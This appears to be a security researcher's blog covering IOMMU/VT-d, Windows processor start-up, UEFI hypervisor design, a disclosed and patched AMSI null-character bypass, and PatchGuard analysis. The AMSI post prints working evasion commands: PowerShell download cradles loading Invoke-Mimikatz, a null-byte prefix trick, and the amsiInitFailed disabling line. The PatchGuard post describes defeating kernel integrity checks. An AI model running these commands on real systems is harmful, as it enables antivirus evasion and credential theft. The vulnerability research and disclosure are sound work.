Monday, May 18, 2020

Introductory Study of IOMMU (VT-d) and Kernel DMA Protection on Intel Processors

This post is a write up of the introductory study of Intel VT-d, especially about how DMA remapping may be programmed and how Windows uses it. The hope is that this article helps you gain a basic understanding of it and start looking into more details as you are interested.

Intel VT-d

Intel VT-d, formally called as Intel VT for Directed I/O, consists of the following three features:
  • DMA Remapping
  • Interrupt Remapping
  • Interrupt Posting
DMA remapping is the most commonly discussed feature out of those and is the focus of this article.

DMA Remapping

DMA Remapping is an important feature because it allows software to implement security against Direct Memory Access (DMA) from malicious devices by configuring access permissions for each physical memory page. While ordinary memory page protections can be configured through the paging structures, and when Intel VT-x is used, through the Extended Page Tables (EPT), those configurations are completely ignored in case of DMA access. Therefore, the other protection mechanism is required to complete the protection of memory. DMA remapping achieves this.

The following illustration from the specification highlights that DMA goes through DMA remapping instead of CPU memory virtualization (ie, EPT). 

VT-x Not Required

Ignore the upper half of the illustration above. It is a typical misconception that VT-d (DMA remapping) is tied with VT-x, virtual machines, and such. DMA remapping is usable and useful without VT-x; Windows, for example, can enable a DMA remapping based security feature (called Kernel DMA Protection) without requiring VT-x based security (VBS: Virtualization Based Security) enabled.

The sample project shown in this post below enables DMA remapping independently as well.


DMA remapping is also referred to as IOMMU, as it functions like Memory Management Unit (MMU) for IO memory access. Not only the concept is similar, but it also has a very similar programming interface as that of MMU, that is, the paging structures and EPT. 

At high-level, the major difference is that DMA remapping uses two more tables for translation, on the top of the familiar PML5, 4, PDPT, PD, and PT. Simply put, translation with MMU is
  • Hardware register => PML4 => PDPT => ...
while that of IOMMU is
  • Hardware register => Root table => Context table => PML4 => PDPT => ...
The specification refers to the tables referenced from the context table as the second-level page tables. The below diagram illustrates the translation flow.
Notice that,
  • The entry of the root table is selected based on the bus number of the device requesting DMA.
  • The entry of the context table is selected based on a combination of device and function numbers of the device.
As an example of bus:device:function (referred to as source-id) assignment, my test DMA-capable device is listed as Bus 6 : Device 0 : Function 0 on one system as shown below.

Sample Code and Demo

Let us jump into some code. The HelloIommuPkg is a runtime DXE driver that enables DMA remapping and protects its first page (PE header) from DMA read and write by any devices. 

Loading this will yield the following output and protect the page if successful.
Then, performing DMA read with the test PCI device using PCILeech demonstrates that the other page is readable,

but the protected page is not.

By inspecting one of the reported fault-recording registers using RWEverything, it can be confirmed that DMA was indeed blocked by a lack of read-permission.
  • The first column indicates the faulting address (0x6ff48000)
  • The third column indicates the source-id of the requesting device (Bus 6 : Device 0 : Function 0)
  • 6 in the fourth column indicates the lack of read-permission.

Programming IOMMU 

Enabling DMA remapping at a minimum can be divided into the following steps:
  1. Locating the DMA Remapping Reporting (DMAR) ACPI table.
  2. Gathering information about the available DMA remapping hardware units from DMA-remapping hardware unit definition (DRHD) structures in (1).
  3. Configuring translation by initializing the tables mentioned above. 
  4. Writing hardware registers to use (3) and activating DMA remapping.
HelloIummuDxe.c roughly follows this sequence with some demonstration and error checking code. (1) and (2) are straightforward and can be validated tools like RWEverything.

The complexity of (3) varies largely depending on how granular and selective translations and memory protections are required. HelloIummuPkg allows any access from any device to anywhere, except against the single page, which simplifies this step. (4) is mostly just following the specification.

Overall, the minimum steps are simple and HelloIummuPkg's line count without comments is less than 700 lines.

Use of DMA Remapping on Windows 

Windows uses DMA remapping when available. If the system does not enable Kernel DMA Protection, it configures translations mostly to pass-through all requests from all devices with few exceptions.

The following screenshot taken from the system without Kernel DMA Protection shows translation for the DMA-capable device at Bus 7 : Device 0 : Function 0. The value 9 at the right bottom indicates DMA requests are passed thought (See "TT: Translation Type" in the specification). 

Notice the most of the entries points to the same context table at 0x1ac000 which is configured for pass-through, providing no protection.

As a side note, it would be technically possible for third-party Windows drivers to modify those translations and attempt to provide additional security against DMA unless VBS is enabled.

Use of DMA Remapping with Kernel DMA Protection

If Kernel DMA Protection is enabled, most of the translations are configured to fail. This is achieved by pointing to the second-level PML4 that is filled with zero, meaning translations are not present.

The below screenshot shows an example configuration with Kernel DMA Protection. Notice the context table at 0x1ac000 points to the second level PML4 at 0x251000, which is all zero.

Note that those memory locations are not visible if VBS is enabled. Disable it to inspect them.

Interestingly, I was not able to observe the described behavior of Kernel DMA Protection, in that, regardless of whether the screen is locked, performing DMA against the device resulted in bug check 0xE6: DRIVER_VERIFIER_DMA_VIOLATION (type 0x26). From what I read from Hal.dll, it made sense to bug check, but I doubt this is how Kernel DMA Protection is supposed to protect the system.


DMA remapping is part of the Intel VT-d architecture providing security against DMA from malicious devices and can be enabled without Intel VT-x to be used together. The sample project HelloIommuPkg demonstrates the simple setup of DMA remapping from UEFI with less than 700 lines of code.

It is shown that Windows enables DMA remapping if available, and when the Kernel DMA Protection feature is enabled, DMA access is mostly blocked though the second-level PML4.

Further Learning Resources

A cat protected from direct access.

Friday, March 20, 2020

Initializing Application Processors on Windows

This post guides you to the journey of starting up application processors (APs) on Windows. This post can be read just for fun but can also help you make more sense of the INIT-SIPI-SIPI VM-exits sequence you have to handle when writing an UEFI hypervisor.

AP Initialization and Overview of Its Implementation

Before running any software code, hardware selects the processor that gets initialized and starts executing firmware code. This processor is called a bootstrap processor (BSP) and is basically the sole active processor until an operating system starts up the rest of the processors. 

Those non-BSP are called APs and are initialized by the BSP sending a sequence of inter processor interrupts (IPIs): INIT, Startup IPI, and the 2nd Startup IPI. This sequence is also referred to as INIT-SIPI-SIPI.

As noted in the previous post, a hypervisor that starts earlier than the operating system needs to handle VM-exists caused by those IPIs. But when that happen exactly? 

On Linux, this is relatively easy to find out. Searching "STARTUP IPI" in Linux source code or other developers' forums leads you to the implementation, smpboot.c. On Windows 10, this is done in HalpApicStartProcessor, called from kernel's KeStartAllProcessors, in short. The stack trace is shown below: 

00 hal!HalpApicStartProcessor
01 hal!HalpInterruptStartProcessor
02 hal!HalStartNextProcessor
03 nt!KeStartAllProcessors
04 nt!Phase1InitializationDiscard
05 nt!Phase1Initialization
06 nt!PspSystemThreadStartup
07 nt!KiStartSystemThread

Let us look into little more details on Windows 19H1 (18362.1.amd64fre.19h1_release.190318-1202) without Hyper-V enabled. To be clear, the execution path varies drastically if Hyper-V is enabled.

High Level Flow

KeStartAllProcessors captures various system register values with KxInitializeProcessorState, updates per processor book keeping data structures and calls HalStartNextProcessors for each registered processor one by one to start all of them. 

HalpInterruptStartProcessor builds stub code and temporal data structures required for APs to go through real-mode, 32 bit protected-mode, and long-mode, such as page tables, GDT, and IDT. HalpLowStub (that is PROCESSOR_START_BLOCK according to this talk by Alex Ionescu) is the address of where those are build and the very entry point of the AP. We will review the entry point code and how it goes up to the NT kernel. 

HalpInterruptStartProcessor, after the stub is built. executes HalpApicStartProcessor which is responsible for issuing the INIT-SIPI-SIPI sequence. Pseudo code of this function is shown below.

NTSTATUS HalpApicStartProcessor(     UINT64,     UINT32 LocalApicId,     UINT64,     UINT32 StartupIp     ) {     //     // Assert INIT, then de-assert it. INIT-deassert IPI is done only for backword     // compatibility.     // See: Local APIC State After It Receives an INIT-Deassert IPI     //     HalpApicWriteCommand(LocalApicId, 0xC500); // APIC_INT_LEVELTRIG | APIC_INT_ASSERT | APIC_DM_INIT     KeStallExecutionProcessor(10u);
    HalpApicWriteCommand(LocalApicId, 0x8500); // APIC_INT_LEVELTRIG | APIC_DM_INIT     KeStallExecutionProcessor(200u);
    //     // Compute the SIPI message value and send it.     // "the SIPI message contains a vector to the BIOS AP initialization code (at     //  000VV000H, where VV is the vector contained in the SIPI message)."     // See: 8.4.3 MP Initialization Protocol Algorithm for MP Systems     //     sipiMessage = (StartupIp & 0xFF000 | 0x600000u) >> 12;  // APIC_DM_STARTUP     HalpApicWriteCommand(LocalApicId, sipiMessage);     KeStallExecutionProcessor(200u);     HalpApicWaitForCommand();     KeStallExecutionProcessor(100u);
    //     // Send the 2nd startup IPI.     //     HalpApicWriteCommand(LocalApicId, sipiMessage);     KeStallExecutionProcessor(200u);

Note that those HalpApic functions are the function pointers that are set for APIC or APICx2 according to the system configurations.

Then let us review how APs get initialized by following the stub code.

AP Initialization Code

HalpRMStub - Real-Mode 

The entry point code is symbolized as HalpRMStub. As the name suggests, running in the real-mode, right after the SIPI.  As seen in the screenshot below, the stub code sets CR0.PE (0x1) enabling the protected mode and jumps out to somewhere.

As it is 16bit code, the instructions show by Windbg is slightly broken. Below is the correct output.

Also, let us switch to physical addresses since the code runs in the real-mode.

From code, the value of EDI is known to be 0x13000, because EDI is CS << 4, and CS is [19:12] of the IP, as stated in 8.4.3 (see the comment in the above pseudo code).

HalpPMStub - Protected-Mode 

Following EDI+0x60 navigates us to the protected mode stub implemented as HalpPMStub.

This code is responsible for switching to the long-mode. As seen below, it
  • sets CR4.PSE (0x1000),
  • updates IA32_EFER, then
  • sets CR0.PG (0x8000000), to activate the long-mode (see the second screenshot).

Then, it jumps out to where RDI+0x66 specifies. 

HalpLMIdentityStub - Long-Mode under Identity Mapping

The JMP leads to the short stub whose sole responsibility is to retrieve the value of CR3 that can permanently be used, that is, the same value as that of BSP.

As the processor should already working with the virtual addresses, let us switch to it.

RDI+0x70 gives us HalpLMStub.

HalpLMStub - Long-Mode

This is the final stub that APs go through. The first thing this stub does is to apply the permanent CR3 value to have the same memory layout as BSP (and any other already initialized APs) followed by invalidation of TBLs.

After switching the page tables, it performs various initialization, and at the end, it jumps out to where RDI+0x278 indicates.
This ends up with nt!KiSystemStartup, letting the AP run the same initialization code as BSP (except few things done exclusively by BSP).


We reviewed how Windows initiates execution of APs with the INIT-SIPI-SIPI sequence and how APs go though from real-mode to the regular NT kernel initialization function on Windows 10 19H1 without Hyper-V.
Hopefully, you enjoyed this post and gained more contexts on INIT-SIPI-SIPI VM-exits you may see while writing a hypervisor too.

Friday, March 13, 2020

Introduction and Notes on Design Considerations of UEFI-based Hypervisors

In this post, I am going to write up some of the lessons learned and the challenges I had to go through to write a UEFI-based hypervisor that supports booting Windows. I hope this post gives pointers to study and helps you get started with writing a similar hypervisor.
UEFI hypervisor brief design walk-through


Lately, I spent some time to study EDK2-based UEFI programming and developed a hypervisor as a UEFI driver. It has been fun and turned out to be more straightforward than I initially imagined, but at the same time, there were some learning curves and technical challenges I had to take extra time to understand and overcome.

The major reason of taking extra time was lack of write ups or tutorials for my goal. Although there were few open-source projects and many documents and presentations I was able to study, those were not focused on UEFI programming with the context of writing hypervisors. This is entirely understandable as I do not suppose those are common subjects, and that was also why I wrote up this post.

In this post, I will start by giving a high-level overview of UEFI, and unique aspects in its execution environment, then look into challenges of writing a hypervisor as a UEFI driver.

UEFI Execution Environment


UEFI is the specification of firmware to replace legacy-BIOS, where no standard exists, and offers a well-defined execution environment and programming interfaces. EDK2 is the open-source, reference implementation of the specification and provides tools to develop firmware modules.

Application vs Driver

Firmware modules can be built as part of a whole firmware image or as a standalone module (file) to be separately deployed. The latter is how I compiled the module. Additionally, UEFI modules can be written as an application which is unloaded from memory once its execution finishes, or as a driver which remains loaded unless explicitly unloaded. Obviously, the driver is the natural choice for the hypervisor, although I will mention the other common approach later.

Boot Time vs Run Time

The execution environment of drivers can be separated into two different phases: boot time and run time.

Frankly speaking, the boot time is before execution is handed over to the operating system and the run time is after that. This transition happens when a UEFI defined API called ExitBootServices is called. In the case of Windows startup, this is sometime before winload.efi transfers its execution to ntoskrnl.exe.

Most of the firmware drivers loaded on memory are unloaded at this point because most of them, for example, a network driver for PXE boot, are no longer needed once execution is handed over to the operating system. This type of driver is called boot drivers, and not suitable for the hypervisor that is meant to stay alive even after the operating system is fully started.

Runtime drivers, on the other side, are the type of driver that resides on memory throughout the system life span and suited for the hypervisor.

Boot-time Services vs Run-time Services

UEFI defines a collection of APIs, and their availability is impacted by the boot-to-run time transition. The type of API called boot-time services can no longer be used after the transition because drivers that implement the API are unloaded. After this transition, runtime drivers can only use the run-time services, which drastically reduces the ability of the hypervisor to interact with the environment.

Physical Mode vs Virtual Mode

Another transition that the runtime drivers have to go through is the change of the memory address layout.

At the boot time, the system is in the long-mode, same as Windows. However, virtual to physical address mapping is pure 1:1, that is, the virtual address 0xdf2000 is translated into the physical address 0xdf2000. This mode is called physical mode.

Soon after the transition to run time, a bootloader (winload.efi in the case of Windows) sets up and configures new page tables to map runtime drivers to the addresses that work well with the operating system (eg, the physical address 0xdf2000 may be mapped to 0xfffff803`1ce40000). Then, the bootloader calls the SetVirtualAddressMap run-time service letting runtime drivers perform their preparation, switches to the new page table and discards the old page table. After this point, the runtime drivers are mapped to only the new address, just like regular Windows drivers. This mode is called virtual mode. This transition can be catastrophic if the hypervisor depends on the physical mode page tables. We will review how it can be a problem.

Application Processor Start-Up

Another unique event that the UEFI hypervisor has to handle is processor initialization. Processors that are not selected as a bootstrap processor (BSP; the processor initialized first) are called application processors (APs) and are initialized after transitioning to the virtual mode. This is done by BSP signaling INIT and Startup-IPI (SIPI). When SIPI is signaled, APs start its execution on the real-mode and go through mode transition up to the long-mode (in the case of the 64bit operating systems). This requires some extra VM-exit handling that was not relevant for the blue pull style hypervisors.

Those unique aspects of the UEFI environment pose technical challenges and require different hypervisor design considerations.

Challenges, Solutions, and Considerations

Host CR3

As mentioned, the host CR3 becomes invalid if the value at the time of driver load is used because that would be physical mode page tables that get destroyed. The most straightforward solution for this is to set up our own page tables with the same translation as the existing one (ie, physical mode page tables) and use them for the host. This may sound complicated but is implemented with just 50 lines of C code in MiniVisor.

However, this results in having different address translations once the guest switches to the virtual mode and makes it significantly difficult for the host to interact with the guest. For example, host code cannot be debugged with tools like Windbg anymore because none of Windows code is mapped in a usable form while the host is running. If the hypervisor is going to need complex interaction with the guest virtual address, other approaches might make it simpler at the end. In a private build, I implemented a guest shell-code that runs in the same address space as the NT system process for interaction with the guest.
Injecting the guest agent that hooks Windows kernel API
It also makes it harder to access the guest virtual memory from the host for the same reason without implementing the guest-virtual-to-host-virtual mapping mechanism. MiniVisor implements this in MemoryAccess.c. This is essentially what every single hypervisor implements. 

Host IDT

For the same reason as the host CR3 is discarded, the host IDT becomes invalid if the value at the time of driver load is used. Although this does not cause an issue immediately because interrupt is disabled during execution of the host, any programming error causing exception will cause triple fault without running any diagnostics code. The solution is to create its own IDT for the host.

Having its own IDT, however, means NMI can no longer be delivered to the Windows kernel if that occurs during the execution of the host (reminder: NMI still occurs even if interrupts are disabled). MiniVisor discards NMI for simplicity but you should consider reinjecting it into the guest instead.

Host GDT

You may wonder about the GDT. Yes, the GDT also needs to be created, but also requires modification because firmware does not set up the task state segment that is required for VMX.


Console output API is the boot-time service that cannot be used after the transition to run time. Hence, console-based logging must be ceased after that point. This could be addressed in several ways, such as hooking into operating system logging API, but the simplest solution is to use serial output instead of console output. This has its limitations but requires almost zero extra code.

Another sensible option is to have ring buffer to store log entries, and later, let a client application to pull and print them out.

Testing Application Processors Startup

This requires the hypervisor to handle VM-exits as well as proper emulation of paging mode transitions that are not relevant for the blue pull-style hypervisors. Specifically, handling of INIT, SIPI and CR0.PG access are required.

For me, this was one of the most challenging parts of writing a hypervisor that supports booting an operating system, mostly due to lack of available virtualization solutions as a test environment and difference between them and the bare-metal environment (eg, TLB, MSR etc), requiring through testing with bare-metal.

My recommendation is to buy and set up a single-board computer with a serial port so you can at least do printf-debugging (or even better, Direct Connect Interface support). I might blog about selecting devices and setting them up.
Testing with a single-board computer

Driver vs Standalone File

Compiling the hypervisor as a runtime driver works as demonstrated in the project. However, the more common approach is to build the hypervisor as a separate file and a UEFI application loads it into memory and starts executing it. That is how VMware hypervisor as well as Hyper-V is implemented, as examples. The standalone hypervisor format is often ELF because of wider cross-platform compiler and debugging tool support. 

This approach has an advantage that the hypervisor code remains platform agnostic and re-usable; for example, one can write a small Windows driver as a hypervisor loader without mixing up platform dependent loader code and hypervisor code that should be platform independent. Then, the hypervisor module can remain portable.

MiniVisor did not take this approach just because of lack of structure started from experimentation. I plan to restructure the project in this way. 


We reviewed some uniqueness of the UEFI environment and how those impact design and implementation of hypervisors compared with those designed under the blue-pill model. We also looked at how MiniVisor was designed to work with those new factors and implied limitations.

While this short blog post may not be sufficient for some readers to have clear ideas of those challenges and explained solutions, I hope this post gives you some pointers to study the codebase of MiniVisor and help make sense of why things are written in different ways than the blue pill-style Windows hypervisor.

Further Learning

As a final note, if you are particularly curious about tooling hypervisor for research and/or just having a solid understanding of the underneath technologies and concepts, Bruce Dang and I plan to offer a 5 days class this October. This will let you write your hypervisor for both Windows and UEFI environments, develop "something useful" and play with them on physical and virtual machines to internalize technical details. 

Please sign up from this page or contact us if you are interested in.

Friday, February 16, 2018

AMSI Bypass With a Null Character

In this blog post, I am going to look into a flaw I reported a few months ago and see how the flaw could have been exploited to execute malicious PowerShell scripts and commands while bypassing AMSI based detection. This issue has been fixed as defense-in-depth with the February Update.

What is AMSI

AMSI, Anti-malware Scan Interface, is a mechanism Windows 10+ provides security software vendors for developing software that subscribes certain events and detects malicious contents. AMSI issues several types of events, but the most commonly used one by the software vendors is arguably the events about execution of scripts, where software can receive contents of those scripts and commands about to be executed (I will refer to them as contents simply), then scan and block them. 

The below illustration is an overview of how this event is generated and notified to security software for scanning.

The red boxes are security software that subscribes the events from AMSI and are called AMSI providers. When supported script engines such as PowerShell (i.e., System.Management.Automation.dll) and Windows Script Host (e.g., JScript.dll) execute contents, they call one of the functions exported from amsi.dll with the contents to scan with AMSI providers.  

As illustrated above, AMSI providers rely on script engines to call the exported function and forward contents properly through amsi.dll; or, they would not receive contents and detect malicious strings.

The Bug

The bug fixed was System.Management.Automation.dll did not take account of that PowerShell contents could include null characters in them and called AmsiScanString, which treated a null character as the end of contents, to forward contents to AMSI providers. Here is the prototype of the API.
  _In_     HAMSICONTEXT amsiContext,
  _In_     LPCWSTR      string,   // Will be terminated at the first null character
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result

Because of this bug, amsi.dll could truncate contents (value of "string" above) at the first null character and then send to AMSI providers. This results in that AMSI providers not being able to scan all of the contents and detect malicious strings.


The basic idea for exploitation is to place a null character into PowerShell contents before malicious strings appear.

File Based Exploitation

As a basic exploitation scenario, let us assume we are trying to execute Invoke-Mimikatz like this and being detected.
> powershell "IEX (New-Object Net.WebClient).DownloadString('')"

This is because the contents being Invoke-Expression'd are visible to AMSI providers as shown in the below screenshot.

Such detection can be bypassed by placing a null character at the beginning of the file being Invoke-Expression'd.

> powershell "IEX (New-Object Net.WebClient).DownloadString('')"
This successfully bypasses scan and detection by AMSI providers as seen below ("Get-ChildItem Function: | Select-String Invoke" is added for a demonstration purpose).

Command Line Based Exploitation

With the above successful bypass, you might try to execute loaded Invoke-Mimikatz like below, but find it gets detected due to an appearance of "Invoke-Mimikatz" in the command line.
powershell "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCerts"

A naive approach with Invoke-Expression could bypass process command line based detection but not AMSI based one, as "Invoke-Mimikatz" will still be visible to AMSI providers. Here is such an unsuccessful attempt.
powershell "IEX (New-Object Net.WebClient).DownloadString(''); IEX ('Invoke-'+'Mimikatz -DumpCerts')"

To bypass AMSI detection in this scenario, we can insert a null character into the command line with a bit of string manipulation.
powershell "IEX (New-Object Net.WebClient).DownloadString(''); IEX ('if(0){{{0}}}' -f $(0 -as [char]) + 'Invoke-'+'Mimikatz -DumpCerts')"

The highlighted part prepends a null character that never gets executed to the original command line. A resulted string will look like this.
if (0) {<NULL>} the rest of commands

This can successfully prevent AMSI providers from receiving all of the contents and detecting "Invoke-Mimikatz."

Summary of Exploitation

For file contents, insert "#<NULL>" at the beginning of the file, and any places where additional scans with AMSI occur. To identify the latter places, some try-and-error will be needed. Using a debugger and logging invocation of AmsiScanString with the below command will be helpful.
bp amsi!AmsiScanString "du @rdx;g"

For command line contents, wrap them into Invoke-Expression and prepend "'if(0){{{0}}}' -f $(0 -as [char]) +". Here is another step-by-step example to bypass detection on "AmsiUtils" and "amsiInitFailed" in the below contents:

1. Wrap the original contents with Invoke-Expression.
IEX ('[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')

2. Prepend the null character to bypass AMSI based detection.
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')

3. Make any modification sufficient to bypass command line based detection.
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.Amsi'+'Utils").GetField("amsi'+'InitFailed","NonPublic,Static").SetValue($null,$true)')

It is worth noting that this exploitation is usable even on the Constrained Language Mode and does not trigger any event logs, unlike the most of AMSI bypass techniques which use reflection.

Fix and Recommendation

The fix Microsoft made was to use AmsiScanBuffer instead of AmsiScanString in System.Management.Automation.dll. As shown below, this function accepts arbitrary byte sequence for contents.
  _In_     HAMSICONTEXT amsiContext,
  _In_     PVOID        buffer,  // Not terminated at the null character
  _In_     ULONG        length,
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result

This way, AMSI providers can receive and scan entire contents even if a null character appears in the middle.

In theory, no action other than applying the patch should be required. However, software vendors using AMSI to scan PowerShell contents should review whether it can handle null characters properly should they appear.

Additionally, security researchers and users of security software can test if their AMSI providers are vulnerable to the bypass technique and ask vendors to address issues if needed. Also, it might be worth monitoring any appearance of a null character in PowerShell contents to detect attempts to exploit this issue.

As for other script engines, PowerShell Core is also affected but does not have a patch as of this writing yet. Windows Script Host is not affected as its interpreter stops reading script contents at the first null character, unlike PowerShell.


Kudos to Alex Ionescu (@aionescu) for helping me report this issue, and Microsoft for fixing it.

Thursday, October 15, 2015

Some Tips to Analyze PatchGuard

I published a new tool called meow that disables PatchGuard on Windows 8.1 on-the-fly. Though qertmeow has some interesting technical details I could explain such as support of ARM (Windows RT) and detection of the end of a function for installing an epilogue hook, on this entry, I am going to explain some techniques that help researchers analyze PatchGuard on your own rather than how this specific exploitation works. 

Those techniques are worthwhile to share because, you have to be able to analyze it if you hope to do something with PatchGuard as it is a moving target, and meow is not going to work forever due to updates of implementation of PatchGuard, or meow may not be perfect even at the time of publication of this article.


As your regular reverse engineering work, you can analyze PatchGuard in both static and dynamic means, but there are some hurdles specific to PatchGuard analysis on both sides, for example:

  • PatchGuard related functions do not have descriptive names or do not have names at all unlike other functions in the kernel
  • Most of function calls in PatchGuard functions are indirect calls like C++ code
  • Kernel debugging is not an option in some situations
  • Code is copied into random locations and stored in an encrypted form, and you cannot easily spot where to monitor at the run-time

Those are significant difficulties you face at the initial stage of analysis, but also ones you can easily overcome if you know some tricks I describe here. The tricks are as follows:

  • Identifying PatchGuard functions
    • Locating an initialization function and checking cross-references
    • Naming functions in a consistent manner
    • Checking the existence of SEH
  • Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard context
    • Dissecting bug check parameters
    • Applying the format of the context to IDA
  • Discovering Threads Executing PatchGuard Code
    • Finding system threads on memory 

let us through them one by one.

Identifying PatchGuard functions

Firstly, you can easily find an initialization function of PatchGuard by sorting a function list by length. The largest function in the ntoskrnl.exe is the initialization function executed at the time of system initialization and sets up a large structure so called the PatchGuard context(s) on non-pagable memory (I am going to describe the structure of the context later). I call this function as Pg_xInitializePatchGuard() in this article.
Image 1: The largest functions on x64 
Image 2: The largest functions on ARM

Secondly, you can identify other PatchGuard related functions with cross-referencing function calls. If a function is referenced from only other PatchGuard related functions, it is safe to assume that the function is PatchGuard dedicated and needs to be analyzed. As an example, let us take a look at a caller of Pg_xInitializePatchGuard(), KiFilterFiberContext(). You see that this function is referenced from Pg_xInitializePatchGuard() and another unnamed function sub_1407339C3() which is not called by anywhere. At this stage, it is safe to say that KiFilterFiberContext() and sub_1407339C3() are only used for PatchGuard.
Image 3: Callers of Pg_xInitializePatchGuard()

Image 4: Callers of  sub_1407339C3()

For ease of analysis with IDA, it is worth naming functions in a consistent manner since a number of functions to be analyzed is going to be large. I usually name PatchGuard functions with prefixes Pg_ or Pg_x for ones with symbols names and for ones without symbol names, respectively. In this case, I name KiFilterFiberContext() as Pg_KiFilterFiberContext(), and sub_1407339C3() as Pg_xKiFilterFiberContextCaller().
Image 5: Filtering functions with the prefix

You may also want to use to discover code flow using SEH. With this script, you find that Pg_xKiFilterFiberContextCaller() is an __except expression and corresponding __try is in KeInitAmd64SpecificState(). By now, you may rename Pg_xKiFilterFiberContextCaller() as Pg_xKeInitAmd64SpecificStateExceptionHandler() and KeInitAmd64SpecificState() as Pg_KeInitAmd64SpecificState().
Image 6: Reflected SEH information

Image 7: Where the corresponding __try is

Similarly, you can repeat the same process against all functions and global variables referenced from each Pg_*() function using the Proximity browser of IDA. This gives you a fairly comprehensive list of Pg_ functions, which can be discouraging enough to most of casual reverse engineers ;)

Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard Context

As soon as you start to read Pg_*() functions, you discover that there are countless of indirect calls with specific registers. Those are accesses to the PatchGuard context, and it is essential to know what are stored and how they are used to understand the internals of PatchGuard.
Image 8: References to the PatchGuard context
The most precise way to accomplish this is to read the initialization function (i.e., Pg_xInitializePatchGuard()) for function pointers and a main variation routine (i.e., Pg_FsRtlMdlReadCompleteDevEx()) for variables. Besides static analysis, it is also a wise idea to perform dynamic analysis to get a large view of it quickly, especially at the initial stage of analysis.

There are some difficulties to perform effective run-time analysis, however.

First of all, you do not know where to monitor at the beginning of analysis since most of core code are copied onto random memory locations and stored in an encoded form except for the time of execution. In addition to that, setting breakpoints or installing hooks onto the kernel causes bug check 0x109 unless you know how integrity check is carried out. Moreover, you may not able to attach a kernel debugger to the system running on some non-PC devices such as Windows RT and Windows Phone.

It may sounds pretty bad to us, but a good news is that we can still uncover the contents of the PatchGuard context with analyzing crash dump. Specifically, you can interpret each 'reserved' bug check parameter in the following ways on x64:

  • Arg1 - 0xA3A03F5891C8B4E8 = An address of the PatchGuard context
  • Arg2 - 0xB3B74BDEE4453415 = An address of a validation structure that detected corruption
  • Arg3 = An address of corrupted data (in most cases)

    NB: You can easily spot those magic values in Pg_FsRtlMdlReadCompleteDevEx() before a call to  Pg_SdbpCheckDll() as well as code setting bug check parameters.

Let us take a look at an example on Windows 10. This is what you get on bug check 0x109:
0: kd> !analyze -v
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *


Arg1: a3a01f597768b4f0, Reserved
Arg2: b3b72bdfc9e65cc3, Reserved
Arg3: fffff80100af8074, Failure type dependent information
Arg4: 0000000000000001, Type of corrupted region, can be
Then, check the first parameter:
kd> ? a3a01f597768b4f0 - 0xA3A03F5891C8B4E8
Evaluate expression: -35180519620600 = ffffe000`e5a00008
kd> dps ffffe000`e5a00008 l200
ffffe000`e5a00008  70047266`b0b8a753
ffffe000`e5a000e0  00000000`00000000
ffffe000`e5a000e8  fffff801`00453b80 nt!ExAcquireResourceSharedLite
ffffe000`e5a000f0  fffff801`004537f0 nt!ExAcquireResourceExclusiveLite
ffffe000`e5a000f8  fffff801`00688930 nt!ExAllocatePoolWithTag
ffffe000`e5a00100  fffff801`006896d0 nt!ExFreePool
ffffe000`e5a004b8  fffff801`00b850b0 nt!HandleTableListLock
ffffe000`e5a004c0  ffffc001`0c614000 nt!ObpKernelHandleTable
ffffe000`e5a004c8  fffff780`00000000 nt!KiUserSharedData
ffffe000`e5a004d0  ff73c402`76affdcd ; a copy of nt!KiWaitNever
ffffe000`e5a004d8  fffff801`00b292c0 nt!SeProtectedMapping
In this example, ffffe000`e5a00008 is an address of the PatchGuard context starting with random-looking bytes followed by a bunch of function pointers and variables. Although you may not tell what some variables are at a glance, defining the PatchGuard structure in IDA with this result is fundamental to uncover how PatchGuard works.
Image 9: Defining the structure in IDA

Image 10: Applied the structure definition

The second parameter is an address to the validation structure that detected corruption. There are multiple structures and each corresponds to a type of corrupted region (Arg4). Their formats vary but are mostly made up of at least: type of corrupted region, address(es) to verify, checksum(s) to be expected as valid value(s).

The following is dump of the structure in this example (I commented with some guesswork):
kd> ? b3b72bdfc9e65cc3 - 0xB3B74BDEE4453415 
Evaluate expression: -35180519544658 = ffffe000`e5a128ae
kd> dps ffffe000`e5a128ae
ffffe000`e5a128ae  00000000`00000001   ; type of corrupted region
ffffe000`e5a128b6  fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)
                                       ; an address of .pdata 
ffffe000`e5a128be  244e1425`0004a9e8   ; checksum?, a virtual size of .pdata
ffffe000`e5a128c6  fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)
                                       ; an address of .pdata 
ffffe000`e5a128ce  fffff801`0041c000 nt!WerLiveKernelInitSystem <PERF> (nt+0x0)
                                       ; an address of nt image base
ffffe000`e5a128d6  0004a9e8`00842000   ; a virtual size of .pdata, a size of nt image
ffffe000`e5a128de  39e90701`406ebd95   ; chehcksums?
ffffe000`e5a128e6  78ca89f0`62a1f735

Those structures are stored at the end of the PatchGuard context as a variable length of an array following other structures and code to recover corruption for reliable bug check and referenced using variable fields containing an offset and a number of arrays.

Discovering Threads Executing PatchGuard Code

another trick for run-time analysis is discovering threads running on memory and setting break points there. It is possible only when you are able to attach a kernel debugger to the system.

As I mentioned earlier, PatchGuard contexts including their code are allocated on memory, which is either on executable NonPagedPool or independent pages allocated by MmAllocateIndependentPages(), and it exhibits uncommon outputs in the thread stack trace.
kd> !process 4 
        THREAD ffffe00137df7040  Cid 0004.0064  Teb: ...
        Win32 Start Address nt!ExpWorkerThread (0xfffff803d16ac3f0)
        Child-SP          RetAddr           Call Site
        ffffd001`043ccdb0 fffff803`d1658ab9 nt!KiSwapContext+0x76
        ffffd001`043ccef0 fffff803`d1657fb8 nt!KiSwapThread+0x689
        ffffd001`043ccfb0 fffff803`d1621d0c nt!KiCommitThreadWait+0x148
        ffffd001`043cd040 ffffe001`37ede587 nt!KeDelayExecutionThread+0x1dc
